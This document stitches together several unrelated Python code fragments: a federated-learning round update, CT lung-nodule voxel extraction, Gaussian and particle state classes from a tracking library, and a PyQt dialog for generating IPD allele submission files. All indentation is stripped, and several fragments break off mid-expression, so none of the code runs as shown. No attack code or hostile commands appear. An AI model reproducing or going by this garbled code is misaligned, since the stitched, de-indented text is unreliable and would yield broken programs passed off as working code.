# dump round completion information to tensorboard
if len(self.loss_accumulator):
self.log_train_result(avg_loss)
# update select participants
self.sampled_participants = self.select_participants(
select_num_participants=self.args.total_worker, overcommitment=self.args.overcommitment)
clientsToRun, round_stragglers, virtual_client_clock, round_duration, flatten_client_duration = self.tictak_client_tasks(
self.sampled_participants, self.args.total_worker)
logging.info(f"Selected participants to run: {clientsToRun}")
# Issue requests to the resource manager; Tasks ordered by the completion time
self.resource_manager.register_tasks(clientsToRun)
self.tasks_round = len(clientsToRun)
# Update executors and participants
if self.experiment_mode == events.SIMULATION_MODE:
self.sampled_executors = list(self.individual_client_events.keys())
else:
self.sampled_executors = [str(c_id) for c_id in self.sampled_participants]
self.save_last_param()
self.round_stragglers = round_stragglers
self.virtual_client_clock = virtual_client_clock
self.flatten_client_duration = numpy.array(flatten_client_duration)
self.round_duration = round_duration
self.model_in_update = 0
self.test_result_accumulator = []
self.stats_util_accumulator = []
self.client_training_results = []
if self.round >= self.args.rounds:
self.broadcast_aggregator_events(events.SHUT_DOWN)
elif self.round % self.args.eval_interval == 0:
self.broadcast_aggregator_events(events.UPDATE_MODEL)
self.broadcast_aggregator_events(events.MODEL_TEST)
else:
self.broadcast_aggregator_events(events.UPDATE_MODEL)
self.broadcast_aggregator_events(events.START_ROUND)
def log_train_result(self, avg_loss):
"""Result will be post on TensorBoard"""
self.log_writer.add_scalar('Train/round_to_loss', avg_loss, self.round)
| |
= []
if testPlot:
print ('voxels count ', len(voxel_stack))
for ii in range(0,len(voxel_stack),len(voxel_stack)//10):
f, ax = plt.subplots(1, 2, figsize=(6,3))
ax[0].imshow(voxel_stack[ii, 0, dim // 2],cmap=plt.cm.gray)
ax[1].imshow(vmask_stack[ii, 0, dim // 2],cmap=plt.cm.gray)
return voxel_stack, vmask_stack
def measure_voxels(labs, ims):
#print("Befpre measure.regionprops, labs & intensity shapes: ", labs.shape, ims.shape)
regprop = measure.regionprops(labs, intensity_image=ims) # probkem here on 20170327
voxel_volume = np.product(RESIZE_SPACING)
areas = [rp.area for rp in regprop] # this is in cubic mm now (i.e. should really be called volume)
volumes = [rp.area * voxel_volume for rp in regprop]
diameters = [2 * (3* volume / (4 * np.pi ))**0.3333 for volume in volumes]
labs_ids = [rp.label for rp in regprop]
#ls = [rp.label for rp in regprop]
max_val = np.max(areas)
max_index = areas.index(max_val)
max_label = regprop[max_index].label
bboxes = [r.bbox for r in regprop]
#max_ls = ls[max_index]
idl = labs == regprop[max_index].label # 400
nodules_pixels = ims[idl]
nodules_hu = pix_to_hu(nodules_pixels)
run_UNNEEDED_code = False
if run_UNNEEDED_code:
nodules_hu_reg = []
for rp in regprop:
idl = labs == rp.label
nodules_pixels = ims[idl]
nodules_hu = pix_to_hu(nodules_pixels)
nodules_hu_reg.append(nodules_hu) # NOTE some are out of interest, i.e. are equal all (or near all) to MAX_BOUND (400)
dfn = pd.DataFrame(
{
#"zcenter": zcenters,
#"ycenter": ycenters,
#"xcenter": xcenters,
"area": areas,
"diameter": diameters,
#"irreg_vol": irreg_vol,
#"irreg_shape": irreg_shape,
#"nodules_hu": nodules_hu_reg,
"bbox": bboxes
},
index=labs_ids)
return dfn
def find_voxels_and_blanks(dim, grid, images3, images3_seg, pmasks3, nodules_threshold=0.999, voxelscountmax = 1000, find_blanks_also = True, centralcutonly=True, diamin=2, diamax=10):
if np.sum(pmasks3) > 0:
centralcutonly = False # override centralcut for True nodule masks
zsel = dim // 2 if centralcutonly else range(0,dim)
pmav = pmasks3[:,0,zsel]
ims = images3[:,0,zsel] # selecting the zsel cut for nodules calc ...
ims_seg = images3_seg[:,0,zsel]
sstart = 0
send = images3.shape[0]
pms = pmav[sstart:send]
run_UNNEEDED_code = False
thresh = nodules_threshold # for testing , set it here and skip the loop
segment = 2 # for compatibility of the naming convention
for thresh in [nodules_threshold]: # jusst this one - keeping loop for a while
if find_blanks_also:
idx = np.abs(pms) > thresh
else:
idx = pms > thresh
idx.shape
nodls = np.zeros(pms.shape).astype(np.int16)
nodls[idx] = 1
nx = nodls[idx]
volume = np.sum(nodls) # A check calculation ... :wcounted as a count within hu_describe
nodules_pixels = ims[idx] # flat
nodules_hu = pix_to_hu(nodules_pixels)
part_name = ''.join([str(segment), '_', str(thresh)])
### DO NOT do them here
use_corrected_nodules = True # do it below from 20170311
if not use_corrected_nodules:
df = hu_describe(nodules_hu, uid=uid, part=part_name)
add_projections = False
if add_projections:
nodules_projections = []
for axis in range(3):
#sxm_projection = np.max(sxm, axis = axis)
nodls_projection = np.max(nodls, axis=axis)
naxis_name = ''.join(["naxis_", str(axis),"_", part_name])
if add_projections:
df[naxis_name] = np.sum(nodls_projection)
nodules_projections.append(nodls_projection)
voxels = []
vmasks = []
if not centralcutonly:
for k in range(idx.shape[0]):
if np.sum(idx[k]) > 0:
## find the nodules and take a cut
labs, labs_num = measure.label(idx[k], return_num = True, neighbors = 8 , background = 0) # label the nodules in 3d, allow for diagonal connectivity
dfn = measure_voxels(labs, ims[k])
nodules_count_0 = len(dfn)
## CUT out anything that is outside of the specified diam range
dfn = dfn[(dfn["diameter"] >= diamin) & ((dfn["diameter"] < diamax))] # CUT OUT anything that is less than 3 mm (essentially less than 7 voxels for 2x2x2
nodules_count = len(dfn) # 524 for file 1 of part 8 ..
max_nodules_count = voxelscountmax
n=0
for n in range(max_nodules_count):
if n < len(dfn): # use the nodule data, otheriwse empty
bb = dfn.iloc[n]["bbox"]
zmin = bb[0]
zmax = bb[3]
zlen = bb[3] - bb[0]
ylen = bb[4] - bb[1]
xlen = bb[5] - bb[2]
xmin = np.max([bb[2] - np.max([(grid - xlen ) //2, 0]), 0]) ## do not go beyond 0/left side of the image
xmax = np.min([xmin + grid, ims.shape[-1]]) ## do not beyond the right side
xmin = xmax - grid
if (xmax - xmin) != grid:
print ("ERROR in calculating the cut-offs ..., xmin, xmax =", xmin, xmax)
ymin = np.max([bb[1] - np.max([(grid - ylen ) //2, 0]), 0]) ## do not go beyond 0/left side of the image
ymax = np.min([ymin + grid, ims.shape[-2]]) ## do not beyond the right side
ymin = ymax - grid
if (ymax - ymin) != grid:
print ("ERROR in calculating the cut-offs ..., ymin, ymax =", ymin, ymax)
# here simply takje the entire voxel we have
#images3.shape
voxel = images3[k,:,:, ymin:ymax, xmin:xmax]
vmask = pmasks3[k,:,:, ymin:ymax, xmin:xmax]
voxels.append(voxel)
vmasks.append(vmask)
#voxel.shape
else:# essentially taking the central cuts of the blanks
## find the individual nodules ... as per the specified probabilities
labs, labs_num = measure.label(idx, return_num = True, neighbors = 8 , background = 0) # label the nodules in 3d, allow for diagonal connectivity
if labs_num > 0 and labs.shape[0] >1: # checking for height > 1 is needed as measure.regionprops fails when it is not, for instance for shape (1, 20, 20) we get ValueError: Label and intensity image must have the same shape.
#labs_num_to_store = 5
dfn = measure_voxels(labs, ims)
nodules_count = len(dfn) # 524 for file 1 of part 8 ..
max_nodules_count = voxelscountmax
n=0
for n in range(max_nodules_count):
if n < len(dfn): # use the nodule data, otheriwse empty
bb = dfn.iloc[n]["bbox"]
zmin = bb[0]
zmax = bb[3]
zlen = bb[3] - bb[0]
ylen = bb[4] - bb[1]
xlen = bb[5] - bb[2]
xmin = np.max([bb[2] - np.max([(grid - xlen ) //2, 0]), 0]) ## do not go beyond 0/left side of the image
xmax = np.min([xmin + grid, ims.shape[-1]]) ## do not beyond the right side
xmin = xmax - grid
if (xmax - xmin) != grid:
print ("ERROR in calculating the cut-offs ..., xmin, xmax =", xmin, xmax)
ymin = np.max([bb[1] - np.max([(grid - ylen ) //2, 0]), 0]) ## do not go beyond 0/left side of the image
ymax = np.min([ymin + grid, ims.shape[-2]]) ## do not beyond the right side
ymin = ymax - grid
if (ymax - ymin) != grid:
print ("ERROR in calculating the cut-offs ..., ymin, ymax =", ymin, ymax)
zmin_sel = zmin
zmax_sel = zmax
if centralcutonly: #include only one voxel representation
zmin_sel = zmin + zlen // 2
zmax_sel = zmin_sel + 1
iz=zmin_sel # for testing
for iz in range(zmin_sel,zmax_sel):
voxel = images3[iz,:,:, ymin:ymax, xmin:xmax]
vmask = pmasks3[iz,:,:, ymin:ymax, xmin:xmax]
voxels.append(voxel)
vmasks.append(vmask)
testPlot = False
if testPlot:
print ('scan '+str(iz))
f, ax = plt.subplots(1, 8, figsize=(24,3))
ax[0].imshow(nodls[iz,ymin:ymax, xmin:xmax],cmap=plt.cm.gray)
ax[1].imshow(ims[iz,ymin:ymax, xmin:xmax],cmap=plt.cm.gray)
ax[2].imshow(images3_amp[iz,0, dim//2, ymin:ymax, xmin:xmax],cmap=plt.cm.gray)
ax[3].imshow(voxel[0,dim//2],cmap=plt.cm.gray)
ax[4].imshow(voxel[0,dim],cmap=plt.cm.gray)
ax[5].imshow(voxel[0,dim+1],cmap=plt.cm.gray)
ax[6].imshow(voxel[0,dim+2],cmap=plt.cm.gray)
ax[7].imshow(voxel[0,dim+3],cmap=plt.cm.gray)
if len(voxels) > 0:
voxel_stack = np.stack(voxels)
vmask_stack = np.stack(vmasks)
else:
print_warning = False
if print_warning:
print("WARNING, find_voxels, not single voxel found even though expected")
voxel_stack = []
vmask_stack = []
#print("Nodules, voxels_aggregated: ", len(dfn), len(voxel_stack))
#np.savez_compressed(path_voxels_variant, voxel_stack)
testPlot = False
if testPlot:
print ('voxels count ', len(voxel_stack))
for ii in range(0,len(voxel_stack),len(voxel_stack)//10):
#plt.imshow(voxel_stack[ii,0,dim // 2], cmap=plt.cm.gray)
#plt.show()
f, ax = plt.subplots(1, 2, figsize=(6,3))
ax[0].imshow(voxel_stack[ii, 0, dim // 2],cmap=plt.cm.gray)
ax[1].imshow(vmask_stack[ii, 0, dim // 2],cmap=plt.cm.gray)
return voxel_stack, vmask_stack
def shuffle_scans_masks(scans, masks, seed):
np.random.seed(seed)
index_shuf = np.arange(len(scans))
np.random.shuffle(index_shuf)
scans = scans[index_shuf]
masks = masks[index_shuf]
return scans, masks
def create_unet_training_files (dim, recreate_grid8_March_data=True): # version with backward compatibility
grid8_March_data_str = "a" if recreate_grid8_March_data else "" # used for the the original data/approach
# the main procedure to create training files for the nodule identifier (consolidated version, with backward compatibility for grid 8)
create_main_grid = True
if create_main_grid:
diamins_2_10 = not recreate_grid8_March_data # backward compatible option
if diamins_2_10:
grids = [10, 20]
diamins = [2, | |
current_state
class GaussianState(State):
"""Gaussian State type
This is a simple Gaussian state object, which, as the name suggests,
is described by a Gaussian state distribution.
"""
covar: CovarianceMatrix = Property(doc='Covariance matrix of state.')
def __init__(self, state_vector, covar, *args, **kwargs):
# Don't cast away subtype of covar if not necessary
if not isinstance(covar, CovarianceMatrix):
covar = CovarianceMatrix(covar)
super().__init__(state_vector, covar, *args, **kwargs)
if self.state_vector.shape[0] != self.covar.shape[0]:
raise ValueError(
"state vector and covariance should have same dimensions")
@property
def mean(self):
"""The state mean, equivalent to state vector"""
return self.state_vector
class SqrtGaussianState(State):
"""A Gaussian State type where the covariance matrix is stored in a form :math:`W` such that
:math:`P = WW^T`
For :math:`P` in general, :math:`W` is not unique and the user may choose the form to their
taste. No checks are undertaken to ensure that a sensible square root form has been chosen.
"""
sqrt_covar: CovarianceMatrix = Property(doc="A square root form of the Gaussian covariance "
"matrix.")
def __init__(self, state_vector, sqrt_covar, *args, **kwargs):
sqrt_covar = CovarianceMatrix(sqrt_covar)
super().__init__(state_vector, sqrt_covar, *args, **kwargs)
@property
def mean(self):
"""The state mean, equivalent to state vector"""
return self.state_vector
@property
def covar(self):
"""The full covariance matrix.
Returns
-------
: :class:`~.CovarianceMatrix`
The covariance matrix calculated via :math:`W W^T`, where :math:`W` is a
:class:`~.SqrtCovarianceMatrix`
"""
return self.sqrt_covar @ self.sqrt_covar.T
GaussianState.register(SqrtGaussianState) # noqa: E305
class InformationState(State):
r"""Information State Type
The information state class carries the :attr:`state_vector`,
:math:`\mathbf{y}_k = Y_k \mathbf{x}_k` and the precision or information matrix
:math:`Y_k = P_k^{-1}`, where :math:`\mathbf{x}_k` and :math:`P_k` are the mean and
covariance, respectively, of a Gaussian state.
"""
precision: PrecisionMatrix = Property(doc='precision matrix of state.')
class WeightedGaussianState(GaussianState):
"""Weighted Gaussian State Type
Gaussian State object with an associated weight. Used as components
for a GaussianMixtureState.
"""
weight: Probability = Property(default=0, doc="Weight of the Gaussian State.")
@property
def gaussian_state(self):
"""The Gaussian state."""
return GaussianState(self.state_vector,
self.covar,
timestamp=self.timestamp)
@classmethod
def from_gaussian_state(cls, gaussian_state, *args, copy=True, **kwargs):
r"""
Returns a WeightedGaussianState instance based on the gaussian_state.
Parameters
----------
gaussian_state : :class:`~.GaussianState`
The guassian_state used to create the new WeightedGaussianState.
\*args : See main :class:`~.WeightedGaussianState`
args are passed to :class:`~.WeightedGaussianState` __init__()
copy : Boolean, optional
If True, the WeightedGaussianState is created with copies of the elements
of gaussian_state. The default is True.
\*\*kwargs : See main :class:`~.WeightedGaussianState`
kwargs are passed to :class:`~.WeightedGaussianState` __init__()
Returns
-------
:class:`~.WeightedGaussianState`
Instance of WeightedGaussianState.
"""
state_vector = gaussian_state.state_vector
covar = gaussian_state.covar
timestamp = gaussian_state.timestamp
if copy:
state_vector = state_vector.copy()
covar = covar.copy()
return cls(
state_vector=state_vector,
covar=covar,
timestamp=timestamp,
*args, **kwargs
)
class TaggedWeightedGaussianState(WeightedGaussianState):
"""Tagged Weighted Gaussian State Type
Gaussian State object with an associated weight and tag. Used as components
for a GaussianMixtureState.
"""
tag: str = Property(default=None, doc="Unique tag of the Gaussian State.")
BIRTH = 'birth'
'''Tag value used to signify birth component'''
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.tag is None:
self.tag = str(uuid.uuid4())
class ParticleState(State):
"""Particle State type
This is a particle state object which describes the state as a
distribution of particles"""
state_vector: StateVectors = Property(doc='State vectors.')
weight: MutableSequence[Probability] = Property(default=None, doc='Weights of particles')
parent: 'ParticleState' = Property(default=None, doc='Parent particles')
particle_list: MutableSequence[Particle] = Property(default=None,
doc='List of Particle objects')
fixed_covar: CovarianceMatrix = Property(default=None,
doc='Fixed covariance value. Default `None`, where'
'weighted sample covariance is then used.')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if (self.particle_list is not None) and \
(self.state_vector is not None or self.weight is not None):
raise ValueError("Use either a list of Particle objects or StateVectors and weights,"
" but not both.")
if self.particle_list and isinstance(self.particle_list, list):
self.state_vector = \
StateVectors([particle.state_vector for particle in self.particle_list])
self.weight = \
np.array([Probability(particle.weight) for particle in self.particle_list])
parent_list = [particle.parent for particle in self.particle_list]
if parent_list.count(None) == 0:
self.parent = ParticleState(None, particle_list=parent_list)
elif 0 < parent_list.count(None) < len(parent_list):
raise ValueError("Either all particles should have"
" parents or none of them should.")
if self.parent:
self.parent.parent = None # Removed to avoid using significant memory
if self.state_vector is not None and not isinstance(self.state_vector, StateVectors):
self.state_vector = StateVectors(self.state_vector)
if self.weight is not None and not isinstance(self.weight, np.ndarray):
self.weight = np.array(self.weight)
def __getitem__(self, item):
if self.parent:
p = self.parent[item]
else:
p = None
particle = Particle(state_vector=self.state_vector[:, item],
weight=self.weight[item],
parent=p)
return particle
@property
def particles(self):
return [particle for particle in self]
def __len__(self):
return self.state_vector.shape[1]
@property
def ndim(self):
return self.state_vector.shape[0]
@property
def mean(self):
"""The state mean, equivalent to state vector"""
result = np.average(self.state_vector,
axis=1,
weights=self.weight)
# Convert type as may have type of weights
return result
@property
def covar(self):
if self.fixed_covar is not None:
return self.fixed_covar
cov = np.cov(self.state_vector, ddof=0, aweights=np.array(self.weight))
# Fix one dimensional covariances being returned with zero dimension
return cov
State.register(ParticleState) # noqa: E305
class EnsembleState(Type):
r"""Ensemble State type
This is an Ensemble state object which describes the system state as a
ensemble of state vectors for use in Ensemble based filters.
This approach is functionally identical to the Particle state type except
it doesn't use any weighting for any of the "particles" or ensemble members.
All "particles" or state vectors in the ensemble are equally weighted.
.. math::
\mathbf{X} = [x_1, x_2, ..., x_M]
"""
state_vector: StateVectors = Property(doc="An ensemble of state vectors which represent the "
"state")
timestamp: datetime.datetime = Property(
default=None, doc="Timestamp of the state. Default None.")
@classmethod
def from_gaussian_state(self, gaussian_state, num_vectors):
"""
Returns an EnsembleState instance, from a given
GaussianState object.
Parameters
----------
gaussian_state : :class:`~.GaussianState`
The GaussianState used to create the new EnsembleState.
num_vectors : int
The number of desired column vectors present in the ensemble.
Returns
-------
:class:`~.EnsembleState`
Instance of EnsembleState.
"""
mean = gaussian_state.state_vector.reshape((gaussian_state.ndim,))
covar = gaussian_state.covar
timestamp = gaussian_state.timestamp
return EnsembleState(state_vector=self.generate_ensemble(mean, covar, num_vectors),
timestamp=timestamp)
@classmethod
def generate_ensemble(self, mean, covar, num_vectors):
"""
Returns a StateVectors wrapped ensemble of state vectors, from a given
mean and covariance matrix.
Parameters
----------
mean : :class:`~.numpy.ndarray`
The mean value of the distribution being sampled to generate
ensemble.
covar : :class:`~.numpy.ndarray`
The covariance matrix of the distribution being sampled to
generate ensemble.
num_vectors : int
The number of desired column vectors present in the ensemble,
or the number of "samples".
Returns
-------
:class:`~.EnsembleState`
Instance of EnsembleState.
"""
# This check is necessary, because the StateVector wrapper does
# funny things with dimension.
rng = np.random.default_rng()
if mean.ndim != 1:
mean = mean.reshape(len(mean))
try:
ensemble = StateVectors(
[StateVector((rng.multivariate_normal(mean, covar)))
for n in range(num_vectors)])
# If covar is univariate, then use the univariate noise generation function.
except ValueError:
ensemble = StateVectors(
[StateVector((rng.normal(mean, covar))) for n in range(num_vectors)])
return ensemble
@property
def ndim(self):
"""Number of dimensions in state vectors"""
return np.shape(self.state_vector)[0]
@property
def num_vectors(self):
"""Number of columns in state ensemble"""
return np.shape(self.state_vector)[1]
@property
def mean(self):
"""The state mean, numerically equivalent to state vector"""
return np.average(self.state_vector, axis=1)
@property
def covar(self):
"""Sample covariance matrix for ensemble"""
return np.cov(self.state_vector)
@property
def sqrt_covar(self):
"""sqrt of sample covariance matrix for ensemble, useful for
some EnKF algorithms"""
return ((self.state_vector-np.tile(self.mean, self.num_vectors))
/ np.sqrt(self.num_vectors - 1))
State.register(EnsembleState) # noqa: E305
class CategoricalState(State):
r"""CategoricalState type.
State object representing an object in a categorical state space. A state vector
:math:`\mathbf{\alpha}_t^i = P(\phi_t^i)` defines a categorical distribution over a finite set
of discrete categories :math:`\Phi = \{\phi^m|m\in \mathbf{N}, m\le M\}` for some finite
:math:`M`."""
categories: Sequence[float] = Property(doc="Category names. Defaults to a list of integers.",
default=None)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.state_vector = self.state_vector / np.sum(self.state_vector) # normalise state vector
if self.categories is None:
self.categories = list(map(str, range(self.ndim)))
if len(self.categories) != self.ndim:
raise ValueError(
f"ndim of {self.ndim} does not match number of categories {len(self.categories)}"
)
def __str__(self):
strings = [f"P({category}) = {p}"
for category, p in zip(self.categories, self.state_vector)]
string = ',\n'.join(strings)
return string
@property
def category(self):
"""Return the name of the most likely category."""
return self.categories[np.argmax(self.state_vector)]
class CompositeState(Type):
"""Composite state type.
A composition of ordered sub-states (:class:`State`) existing at the same timestamp,
representing an object with a state for (potentially) multiple, distinct state spaces.
"""
sub_states: Sequence[State] = Property(
doc="Sequence of sub-states comprising the composite state. All sub-states must have "
"matching timestamp. Must not be empty.")
default_timestamp: datetime.datetime = Property(
default=None,
doc="Default timestamp | |
= False
self.show()
ok, msg = settings_ok("IPD", self.settings, self.log)
if not ok:
QMessageBox.warning(self, "Missing IPD settings", msg)
self.close()
def define_sections(self):
"""defining the dialog's sections
"""
self.define_section1()
self.define_section2()
self.define_section3()
self.define_section4()
def define_section1(self):
"""defining section 1: choose project & ENA file
"""
mywidget = QWidget(self)
layout = QHBoxLayout()
mywidget.setLayout(layout)
proj_btn = QueryButton("Choose a (different) existing project",
"select project_name from projects where project_status = 'Open' order by project_name desc")
self.proj_widget = ChoiceSection("Project:", [proj_btn], self.tree, label_width=self.label_width)
if self.project:
self.proj_widget.field.setText(self.project)
proj_btn.change_to_normal(None)
layout.addWidget(self.proj_widget)
self.ok_btn1 = ProceedButton("Proceed", [self.proj_widget.field], self.log, 0)
layout.addWidget(self.ok_btn1)
self.proj_widget.choice.connect(self.ok_btn1.check_ready)
self.ok_btn1.proceed.connect(self.proceed_to2)
self.sections.append(("(1) Choose project:", mywidget))
def check_first_time_proceed(self):
"""checks if this is this user's first IPD submission;
if yes, asks for confirmation before proceeding
"""
if self.settings["modus"] == "staging":
return True
self.log.debug("Checking if this is your first IPD submission...")
query = "select submission_id from ipd_submissions where success = 'yes' limit 1"
success, data = db_internal.execute_query(query, 1, self.log, "Checking for previous IPD submissions",
"Database error", self)
if not success:
return False
if data:
return True
else: # first productive submission
self.log.info("First submission to IPD. Are you sure your settings are ok?")
msg = "This user has never before created IPD submission files.\n"
msg += "Before continuing, please check the 'methods' part of your settings:\n"
msg += "Do these accurately reflect the workflow applied to generate your samples?\n"
msg += "(See user manual under 'submission_ipd' for details.)\n\n"
msg += "Are you really sure your settings are ok?"
reply = QMessageBox.question(self, "First IPD submission",
msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
self.log.info("\t=> Proceed!")
return True
else:
self.log.info("\t=> I'll go check, wait here.")
return False
@pyqtSlot(int)
def proceed_to2(self, _):
"""proceed to next section
"""
self.log.debug("proceed_to_2")
proceed = self.check_first_time_proceed()
if not proceed:
self.ok_btn1.setChecked(False)
return
self.project = self.proj_widget.field.text()
proj_open = check_project_open(self.project, self.log, self)
if not proj_open:
msg = f"Project {self.project} is currently closed! You cannot create IPD-files from closed projects.\n"
msg += "To submit alleles of this project to IPD, please open its ProjectView "
msg += "and click the 'Reopen Project' button!"
msg += "\nAlternatively, please choose a different project."
self.log.warning(msg)
QMessageBox.warning(self, "This project is closed!", msg)
return
self.proceed_sections(0, 1)
def define_section2(self):
"""defining section 1: choose project & ENA file
"""
mywidget = QWidget(self)
layout = QGridLayout()
mywidget.setLayout(layout)
mypath = self.settings["raw_files_path"]
ENA_file_btn = FileButton("Upload email attachment from ENA reply", mypath, parent=self)
self.ENA_file_widget = ChoiceSection("ENA reply file:", [ENA_file_btn], self, label_width=self.label_width)
if self.settings["modus"] == "debugging":
self.ENA_file_widget.field.setText(
r"H:\Projekte\Bioinformatik\Typeloader\example files\both_new\KIR\invalid_ENA.txt")
ENA_file_btn.change_to_normal()
layout.addWidget(self.ENA_file_widget, 1, 0)
befund_file_btn = FileButton("Choose file with pretypings for each sample", mypath, parent=self)
self.befund_widget = ChoiceSection("Pretyping file:", [befund_file_btn], self, label_width=self.label_width)
self.befund_widget.setWhatsThis(
"Choose a file containing a list of previously identified alleles for all loci for each sample")
if self.settings["modus"] == "debugging":
self.befund_widget.field.setText(
r"H:\Projekte\Bioinformatik\Typeloader\example files\both_new\KIR\invalid_pretypings.csv")
befund_file_btn.change_to_normal()
layout.addWidget(self.befund_widget, 2, 0)
self.ok_btn2 = ProceedButton("Proceed", [self.ENA_file_widget.field, self.befund_widget.field], self.log, 0)
self.proj_widget.choice.connect(self.ok_btn2.check_ready)
self.befund_widget.choice.connect(self.ok_btn2.check_ready)
layout.addWidget(self.ok_btn2, 1, 1, 3, 1)
self.ok_btn2.proceed.connect(self.proceed_to3)
self.sections.append(("(2) Upload ENA reply file:", mywidget))
# add hidden button to create fake ENA response & fake pretyping file:
local_user, self.local_cf = check_local(self.settings, self.log)
if local_user: # only visible for LSL users
self.pretypings_btn = QPushButton("Generate pretyping file")
self.pretypings_btn.setStyleSheet(general.btn_style_local)
self.pretypings_btn.clicked.connect(self.get_pretypings)
layout.addWidget(self.pretypings_btn, 1, 1)
if check_nonproductive(self.settings): # only visible for non-productive LSL users
self.fake_btn = QPushButton("Generate fake input files")
self.fake_btn.setStyleSheet(general.btn_style_local)
self.fake_btn.clicked.connect(self.create_fake_input_files)
layout.addWidget(self.fake_btn, 0, 1)
@pyqtSlot()
def create_fake_input_files(self):
"""creates a fake ENA reply file & pretypinsg file
which can be used to create fake IPD files of any alleles in this project;
this functionality can be used to create IPD formatted files for alleles
that have not been submitted to ENA or have not received an ENA identifier, yet
"""
self.log.info("Creating fake ENA response file & fake pretypings file...")
try:
success, ena_file, pretypings_file = make_fake_ENA_file(self.project, self.log, self.settings, "local_name",
self)
except Exception as E:
self.log.exception(E)
QMessageBox.warning(self, "Problem", "Could not generate fake files:\n\n{}".format(repr(E)))
success = False
if success:
self.ENA_file_widget.field.setText(ena_file)
self.befund_widget.field.setText(pretypings_file)
self.fake_btn.setStyleSheet(general.btn_style_normal)
self.ok_btn2.check_ready()
else:
QMessageBox.warning(self, ena_file, pretypings_file)
@pyqtSlot()
def get_pretypings(self):
"""creates pretypings file from oracle database
"""
try:
success, pretypings_file, samples_not_found = get_pretypings_from_oracledb(self.project, self.local_cf,
self.settings, self.log, self)
except Exception as E:
self.log.exception(E)
QMessageBox.warning(self, "Error while generating pretypings file",
"Could not generate the pretypings file:\n\n{}".format(repr(E)))
success = False
if success:
if samples_not_found:
QMessageBox.information(self, "Not all pretypings found",
"Could not find pretypings for the following {} samples: \n- {}".format(
len(samples_not_found),
"\n-".join(samples_not_found)))
try:
suggested_path = os.path.join(self.settings["default_saving_dir"], "pretypings.csv")
chosen_path = \
QFileDialog.getSaveFileName(self, "Download generated pretypings file...", suggested_path)[0]
self.log.info("Saving generated pretypings file under {}...".format(chosen_path))
shutil.copy(pretypings_file, chosen_path)
self.befund_widget.field.setText(chosen_path)
self.pretypings_btn.setStyleSheet(general.btn_style_normal)
except Exception as E:
self.log.exception(E)
QMessageBox.warning(self, "Error while generating pretypings file",
"Could not save the pretypings file:\n\n{}".format(repr(E)))
self.pretypings_btn.setChecked(False)
self.ok_btn2.check_ready()
def parse_ENA_file(self):
"""parses the ENA reply file,
stores results and adjusts filter for IPDFileChoiceTable
"""
self.ENA_reply_file = self.ENA_file_widget.field.text().strip()
self.ENA_timestamp = general.get_file_creation_date(self.ENA_reply_file, self.settings, self.log)
self.ENA_id_map, self.ENA_gene_map = MIF.parse_email(self.ENA_reply_file)
key = "', '".join(sorted(self.ENA_id_map.keys()))
self.add_filter = " and alleles.local_name in ('{}')".format(key)
self.add_filter2 = " and alleles.cell_line_old in ('{}')".format(key)
@pyqtSlot(int)
def proceed_to3(self, _):
"""proceed to next section
"""
self.log.debug("proceed_to_3")
self.parse_ENA_file()
self.refresh_section3()
self.proceed_sections(1, 2)
def refresh_section3(self, keep_choices=False):
"""refreshes data in section3 after project has been changed
"""
self.log.debug("Refreshing section 3...")
self.project_info.fill_UI(self.project)
self.project_files.refresh(self.project, self.add_filter, self.add_filter2, keep_choices=keep_choices)
if not keep_choices:
if self.settings["modus"] == "debugging":
if self.project_files.check_dic: # if debugging, auto-select first file
self.project_files.check_dic[0].setChecked(True)
self.project_files.files_chosen.emit(1)
@pyqtSlot(str, str)
def catch_project_info(self, title, description):
"""catches title & description emitted by ProjectInfoTable
"""
self.title = title
self.description = description
def define_section3(self):
"""defining section 3: choose alleles
"""
self.log.debug("Setting up section3 of IPDSubmissionForm...")
mywidget = QWidget(self)
layout = QHBoxLayout()
mywidget.setLayout(layout)
mywidget.setMinimumHeight(250)
self.project_info = ProjectInfoTable(self.project, self.log, self)
self.project_info.setMaximumWidth(350)
self.project_info.setMinimumWidth(250)
layout.addWidget(self.project_info)
self.project_info.project_info.connect(self.catch_project_info)
self.project_files = IPDFileChoiceTable(self.project, self.log, self)
layout.addWidget(self.project_files)
self.project_files.files_chosen.connect(self.project_info.update_files_chosen)
self.project_files.files.connect(self.project_info.update_files)
self.project_files.old_cell_lines.connect(self.catch_cell_line)
self.project_files.additional_info.connect(self.catch_additional_info)
items = [self.project_info.item(3, 0)]
self.submit_btn = ProceedButton("Generate IPD files", items, self.log, 1, self)
self.submit_btn.proceed.connect(self.make_IPD_files)
self.submit_btn.setMinimumWidth(100)
layout.addWidget(self.submit_btn)
self.project_info.updated.connect(self.submit_btn.check_ready)
self.sections.append(("(3) Choose alleles to submit:", mywidget))
def get_chosen_samples(self):
"""gets results of file choice in section2,
stores them in self.samples
"""
self.samples = []
for i in self.project_files.check_dic:
box = self.project_files.check_dic[i]
if box.checkState():
sample = self.project_files.item(i, 2).text()
local_name = self.project_files.item(i, 3).text()
IPD_nr = self.project_files.item(i, 6).text()
self.samples.append((sample, local_name, IPD_nr))
def get_values(self):
"""retrieves values for IPD file generation from GUI
"""
self.pretypings = self.befund_widget.field.text().strip()
self.log.debug("pretypings file: {}".format(self.pretypings))
self.project = self.proj_widget.field.text().strip()
self.curr_time = time.strftime("%Y%m%d%H%M%S")
self.subm_id = "IPD_{}".format(self.curr_time)
return True
def get_files(self):
"""retrieves ena_file and blast_xml for each chosen sample
"""
self.file_dic = {}
for (sample_id_int, local_name, _) in self.samples:
self.file_dic[local_name] = {}
query = """select blast_xml, ena_file from files
where sample_id_int = '{}' and local_name = '{}'""".format(sample_id_int, local_name)
success, data = db_internal.execute_query(query, 2, self.log,
"retrieving sample files", "Database error", self)
if success:
self.file_dic[local_name]["blast_xml"] = data[0][0]
self.file_dic[local_name]["ena_file"] = data[0][1]
@pyqtSlot(dict)
def catch_cell_line(self, old_cell_lines):
"""catches mapping between cell_line_old and loca_name
for files submitted to ENA under the old cell_line identifier
"""
if old_cell_lines:
self.log.debug(
"Caught mapping between {} old cell_line identifiers and allele names".format(len(old_cell_lines)))
for local_name in old_cell_lines:
cell_line_old = old_cell_lines[local_name]
self.ENA_id_map[local_name] = self.ENA_id_map[cell_line_old]
self.ENA_gene_map[local_name] = self.ENA_gene_map[cell_line_old]
@pyqtSlot(dict)
def catch_additional_info(self, allele_dic):
